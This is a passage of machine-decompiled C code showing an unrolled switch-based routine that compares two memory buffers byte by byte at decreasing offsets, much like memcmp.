																		__ecx =  *(__esi - 2) & 0x000000ff;
																		__ecx = ( *(__esi - 2) & 0x000000ff) - ( *(__edx - 2) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t600 = __ecx > 0;
																			__eflags = _t600;
																			__eax = 0 | _t600;
																			__ecx = _t600 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			goto L320;
																		}
																	}
																	goto L529;
																case 4:
																	L214:
																	_t1063 =  *(_t1354 - 4);
																	__eflags = _t1063 -  *(_t1340 - 4);
																	if(_t1063 ==  *(_t1340 - 4)) {
																		goto L227;
																	} else {
																		_t1270 = (_t1063 & 0x000000ff) - ( *(_t1340 - 4) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t405 = _t1270 > 0;
																			__eflags = _t405;
																			_t1270 = (0 | _t405) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 3) & 0x000000ff) - ( *(_t1340 - 3) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t411 = _t1270 > 0;
																				__eflags = _t411;
																				_t1270 = (0 | _t411) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 2) & 0x000000ff) - ( *(_t1340 - 2) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t417 = _t1270 > 0;
																					__eflags = _t417;
																					_t1270 = (0 | _t417) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 1) & 0x000000ff) - ( *(_t1340 - 1) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t423 = _t1270 > 0;
																						__eflags = _t423;
																						_t1270 = (0 | _t423) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L227;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 5:
																	L307:
																	__eax =  *(__esi - 5);
																	__eflags =  *(__esi - 5) -  *(__edx - 5);
																	if( *(__esi - 5) ==  *(__edx - 5)) {
																		goto L320;
																	} else {
																		goto L308;
																	}
																	goto L529;
																case 6:
																	L400:
																	__eax =  *(__esi - 6);
																	__eflags =  *(__esi - 6) -  *(__edx - 6);
																	if( *(__esi - 6) ==  *(__edx - 6)) {
																		goto L413;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 6) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t764 = __ecx > 0;
																			__eflags = _t764;
																			__eax = 0 | _t764;
																			__ecx = _t764 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 5) & 0x000000ff;
																			__eax =  *(__edx - 5) & 0x000000ff;
																			__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t770 = __ecx > 0;
																				__eflags = _t770;
																				__eax = 0 | _t770;
																				__ecx = _t770 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 4) & 0x000000ff;
																				__eax =  *(__edx - 4) & 0x000000ff;
																				__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t776 = __ecx > 0;
																					__eflags = _t776;
																					__eax = 0 | _t776;
																					__ecx = _t776 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 3) & 0x000000ff;
																					__eax =  *(__edx - 3) & 0x000000ff;
																					__ecx = ( *(__esi - 3) & 0x000000ff) - ( *(__edx - 3) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t782 = __ecx > 0;
																						__eflags = _t782;
																						__eax = 0 | _t782;
																						__ecx = _t782 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L413;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 7:
																	L493:
																	__eax =  *(__esi - 7);
																	__eflags =  *(__esi - 7) -  *(__edx - 7);
																	if( *(__esi - 7) ==  *(__edx - 7)) {
																		goto L314;
																	} else {
																		__eax =  *(__edx - 7) & 0x000000ff;
																		__ecx =  *(__esi - 7) & 0x000000ff;
																		__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t943 = __ecx > 0;
																			__eflags = _t943;
																			__eax = 0 | _t943;
																			__ecx = _t943 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 6) & 0x000000ff;
																			__eax =  *(__edx - 6) & 0x000000ff;
																			__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t949 = __ecx > 0;
																				__eflags = _t949;
																				__eax = 0 | _t949;
																				__ecx = _t949 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				L308:
																				__eax =  *(__edx - 5) & 0x000000ff;
																				__ecx =  *(__esi - 5) & 0x000000ff;
																				__ecx = ( *(__esi - 5) & 0x000000ff) - ( *(__edx - 5) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t582 = __ecx > 0;
																					__eflags = _t582;
																					__eax = 0 | _t582;
																					__ecx = _t582 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__eax =  *(__edx - 4) & 0x000000ff;
																					__ecx =  *(__esi - 4) & 0x000000ff;
																					__ecx = ( *(__esi - 4) & 0x000000ff) - ( *(__edx - 4) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t588 = __ecx > 0;
																						__eflags = _t588;
																						__eax = 0 | _t588;
																						__ecx = _t588 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L314;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 8:
																	L201:
																	_t1062 =  *(_t1354 - 8);
																	__eflags = _t1062 -  *(_t1340 - 8);
																	if(_t1062 ==  *(_t1340 - 8)) {
																		goto L214;
																	} else {
																		_t1270 = (_t1062 & 0x000000ff) - ( *(_t1340 - 8) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t380 = _t1270 > 0;
																			__eflags = _t380;
																			_t1270 = (0 | _t380) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 7) & 0x000000ff) - ( *(_t1340 - 7) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t386 = _t1270 > 0;
																				__eflags = _t386;
																				_t1270 = (0 | _t386) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 6) & 0x000000ff) - ( *(_t1340 - 6) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t392 = _t1270 > 0;
																					__eflags = _t392;
																					_t1270 = (0 | _t392) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 5) & 0x000000ff) - ( *(_t1340 - 5) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t398 = _t1270 > 0;
																						__eflags = _t398;
																						_t1270 = (0 | _t398) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L214;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 9:
																	L294:
																	__eax =  *(__esi - 9);
																	__eflags =  *(__esi - 9) -  *(__edx - 9);
																	if( *(__esi - 9) ==  *(__edx - 9)) {
																		goto L307;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 9) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t556 = __ecx > 0;
																			__eflags = _t556;
																			__eax = 0 | _t556;
																			__ecx = _t556 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 8) & 0x000000ff;
																			__eax =  *(__edx - 8) & 0x000000ff;
																			__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t562 = __ecx > 0;
																				__eflags = _t562;
																				__eax = 0 | _t562;
																				__ecx = _t562 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 7) & 0x000000ff;
																				__eax =  *(__edx - 7) & 0x000000ff;
																				__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t568 = __ecx > 0;
																					__eflags = _t568;
																					__eax = 0 | _t568;
																					__ecx = _t568 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 6) & 0x000000ff;
																					__eax =  *(__edx - 6) & 0x000000ff;
																					__ecx = ( *(__esi - 6) & 0x000000ff) - ( *(__edx - 6) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t574 = __ecx > 0;
																						__eflags = _t574;
																						__eax = 0 | _t574;
																						__ecx = _t574 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L307;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xa:
																	L387:
																	__eax =  *(__esi - 0xa);
																	__eflags =  *(__esi - 0xa) -  *(__edx - 0xa);
																	if( *(__esi - 0xa) ==  *(__edx - 0xa)) {
																		goto L400;
																	} else {
																		__eax =  *(__edx - 0xa) & 0x000000ff;
																		__ecx =  *(__esi - 0xa) & 0x000000ff;
																		__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t739 = __ecx > 0;
																			__eflags = _t739;
																			__eax = 0 | _t739;
																			__ecx = _t739 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 9) & 0x000000ff;
																			__eax =  *(__edx - 9) & 0x000000ff;
																			__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t745 = __ecx > 0;
																				__eflags = _t745;
																				__eax = 0 | _t745;
																				__ecx = _t745 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 8) & 0x000000ff;
																				__eax =  *(__edx - 8) & 0x000000ff;
																				__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t751 = __ecx > 0;
																					__eflags = _t751;
																					__eax = 0 | _t751;
																					__ecx = _t751 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 7) & 0x000000ff;
																					__eax =  *(__edx - 7) & 0x000000ff;
																					__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t757 = __ecx > 0;
																						__eflags = _t757;
																						__eax = 0 | _t757;
																						__ecx = _t757 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L400;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xb:
																	L480:
																	__eax =  *(__esi - 0xb);
																	__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
																	if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
																		goto L493;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xb) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t917 = __ecx > 0;
																			__eflags = _t917;
																			__eax = 0 | _t917;
																			__ecx = _t917 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xa) & 0x000000ff;
																			__eax =  *(__edx - 0xa) & 0x000000ff;
																			__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t923 = __ecx > 0;
																				__eflags = _t923;
																				__eax = 0 | _t923;
																				__ecx = _t923 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 9) & 0x000000ff;
																				__eax =  *(__edx - 9) & 0x000000ff;
																				__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t929 = __ecx > 0;
																					__eflags = _t929;
																					__eax = 0 | _t929;
																					__ecx = _t929 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 8) & 0x000000ff;
																					__eax =  *(__edx - 8) & 0x000000ff;
																					__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t935 = __ecx > 0;
																						__eflags = _t935;
																						__eax = 0 | _t935;
																						__ecx = _t935 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L493;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xc:
																	L188:
																	_t1061 =  *(_t1354 - 0xc);
																	__eflags = _t1061 -  *(_t1340 - 0xc);
																	if(_t1061 ==  *(_t1340 - 0xc)) {
																		goto L201;
																	} else {
																		_t1270 = (_t1061 & 0x000000ff) - ( *(_t1340 - 0xc) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t355 = _t1270 > 0;
																			__eflags = _t355;
																			_t1270 = (0 | _t355) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xb) & 0x000000ff) - ( *(_t1340 - 0xb) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t361 = _t1270 > 0;
																				__eflags = _t361;
																				_t1270 = (0 | _t361) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xa) & 0x000000ff) - ( *(_t1340 - 0xa) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t367 = _t1270 > 0;
																					__eflags = _t367;
																					_t1270 = (0 | _t367) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 9) & 0x000000ff) - ( *(_t1340 - 9) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t373 = _t1270 > 0;
																						__eflags = _t373;
																						_t1270 = (0 | _t373) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L201;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0xd:
																	L281:
																	__eax =  *(__esi - 0xd);
																	__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
																	if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
																		goto L294;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xd) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t531 = __ecx > 0;
																			__eflags = _t531;
																			__eax = 0 | _t531;
																			__ecx = _t531 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xc) & 0x000000ff;
																			__eax =  *(__edx - 0xc) & 0x000000ff;
																			__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t537 = __ecx > 0;
																				__eflags = _t537;
																				__eax = 0 | _t537;
																				__ecx = _t537 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xb) & 0x000000ff;
																				__eax =  *(__edx - 0xb) & 0x000000ff;
																				__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t543 = __ecx > 0;
																					__eflags = _t543;
																					__eax = 0 | _t543;
																					__ecx = _t543 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xa) & 0x000000ff;
																					__eax =  *(__edx - 0xa) & 0x000000ff;
																					__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t549 = __ecx > 0;
																						__eflags = _t549;
																						__eax = 0 | _t549;
																						__ecx = _t549 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L294;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xe:
																	L374:
																	__eax =  *(__esi - 0xe);
																	__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
																	if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
																		goto L387;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xe) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t713 = __ecx > 0;
																			__eflags = _t713;
																			__eax = 0 | _t713;
																			__ecx = _t713 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xd) & 0x000000ff;
																			__eax =  *(__edx - 0xd) & 0x000000ff;
																			__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t719 = __ecx > 0;
																				__eflags = _t719;
																				__eax = 0 | _t719;
																				__ecx = _t719 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xc) & 0x000000ff;
																				__eax =  *(__edx - 0xc) & 0x000000ff;
																				__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t725 = __ecx > 0;
																					__eflags = _t725;
																					__eax = 0 | _t725;
																					__ecx = _t725 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xb) & 0x000000ff;
																					__eax =  *(__edx - 0xb) & 0x000000ff;
																					__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t731 = __ecx > 0;
																						__eflags = _t731;
																						__eax = 0 | _t731;
																						__ecx = _t731 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L387;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0xf:
																	L467:
																	__eax =  *(__esi - 0xf);
																	__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
																	if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
																		goto L480;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xf) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t892 = __ecx > 0;
																			__eflags = _t892;
																			__eax = 0 | _t892;
																			__ecx = _t892 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xe) & 0x000000ff;
																			__eax =  *(__edx - 0xe) & 0x000000ff;
																			__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t898 = __ecx > 0;
																				__eflags = _t898;
																				__eax = 0 | _t898;
																				__ecx = _t898 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xd) & 0x000000ff;
																				__eax =  *(__edx - 0xd) & 0x000000ff;
																				__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t904 = __ecx > 0;
																					__eflags = _t904;
																					__eax = 0 | _t904;
																					__ecx = _t904 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xc) & 0x000000ff;
																					__eax =  *(__edx - 0xc) & 0x000000ff;
																					__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t910 = __ecx > 0;
																						__eflags = _t910;
																						__eax = 0 | _t910;
																						__ecx = _t910 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L480;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x10:
																	L175:
																	_t1060 =  *(_t1354 - 0x10);
																	__eflags = _t1060 -  *(_t1340 - 0x10);
																	if(_t1060 ==  *(_t1340 - 0x10)) {
																		goto L188;
																	} else {
																		_t1270 = (_t1060 & 0x000000ff) - ( *(_t1340 - 0x10) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t330 = _t1270 > 0;
																			__eflags = _t330;
																			_t1270 = (0 | _t330) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xf) & 0x000000ff) - ( *(_t1340 - 0xf) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t336 = _t1270 > 0;
																				__eflags = _t336;
																				_t1270 = (0 | _t336) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xe) & 0x000000ff) - ( *(_t1340 - 0xe) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t342 = _t1270 > 0;
																					__eflags = _t342;
																					_t1270 = (0 | _t342) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0xd) & 0x000000ff) - ( *(_t1340 - 0xd) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t348 = _t1270 > 0;
																						__eflags = _t348;
																						_t1270 = (0 | _t348) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L188;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x11:
																	L268:
																	__eax =  *(__esi - 0x11);
																	__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
																	if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
																		goto L281;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x11) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t506 = __ecx > 0;
																			__eflags = _t506;
																			__eax = 0 | _t506;
																			__ecx = _t506 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x10) & 0x000000ff;
																			__eax =  *(__edx - 0x10) & 0x000000ff;
																			__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t512 = __ecx > 0;
																				__eflags = _t512;
																				__eax = 0 | _t512;
																				__ecx = _t512 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xf) & 0x000000ff;
																				__eax =  *(__edx - 0xf) & 0x000000ff;
																				__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t518 = __ecx > 0;
																					__eflags = _t518;
																					__eax = 0 | _t518;
																					__ecx = _t518 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xe) & 0x000000ff;
																					__eax =  *(__edx - 0xe) & 0x000000ff;
																					__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t524 = __ecx > 0;
																						__eflags = _t524;
																						__eax = 0 | _t524;
																						__ecx = _t524 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L281;
																					}
																				}
																			}
																		}
																	}
																	goto L529;
																case 0x12:
																	L361:
																	__eax =  *(__esi - 0x12);
																	__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
																	if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
																		goto L374;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x12) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t688 = __ecx > 0;
																			__eflags = _t688;
																			__eax = 0 | _t688;
																			__ecx = _t688 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x11) & 0x000000ff;
																			__eax =  *(__edx - 0x11) & 0x000000ff;
																			__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																			__eflags = __ecx;
